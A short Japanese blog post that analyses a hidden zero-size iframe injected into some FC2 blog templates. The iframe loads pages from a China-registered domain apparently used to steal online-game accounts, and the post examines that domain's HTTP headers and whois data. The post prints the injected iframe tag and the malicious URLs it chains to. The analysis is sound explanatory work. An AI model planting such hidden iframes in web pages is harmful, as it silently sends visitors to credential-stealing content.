いくつかのFC2ブログのテンプレートにiframe(インラインフレーム)が仕掛けられていたそうです。
| <iframe src="http://www.dda3.net/"></iframe> |
実際には大きさ0(width="0" height="0")の指定もあります(ブラウザで表示されない)が省略します。
いつものオンラインゲームの中国製アカウントハックです。
iframeで以下の2つのフレームを呼び出します。
| http://www.dda3.net/index.htm |
| http://www.dda3.net/he.htm |
indexがindexを呼んで再帰に陥っているように見えますが、ディレクトリにアクセスした場合にどのファイルを表示するか(あるいはファイル一覧を表示するか403を返すか)はWebサーバ(ApacheやIISなど)の設定次第です。
HTTPヘッダによると
| Content-Location: | http://www.dda3.net/Default.htm |
となっていて、Default.htmがindex.htmとhe.htmを呼び出しています。
そもそもDefault.htmはMicrosoftのIIS(Windowsに付属)のデフォルトとなっています。
HTTPヘッダによると
とWindowsServer2003をお使いのようです。
ちなみにwhoisすると
| Creation Date: | 2008-02-26 |
| Country: | China |
となっており、このアカウントハックのためだけに登録したドメインのようです。
ドメインの登録は無料ではありませんが、RMTのためのささやかな投資です。
根本的な原因はRMTです。
続きます。
メモ:
HTTPヘッダ ブラウザもHTTPヘッダで通信しているぞ! Googleで調べてみよう!
whois ドメインの情報を調べることができるぞ! Googleで(略)
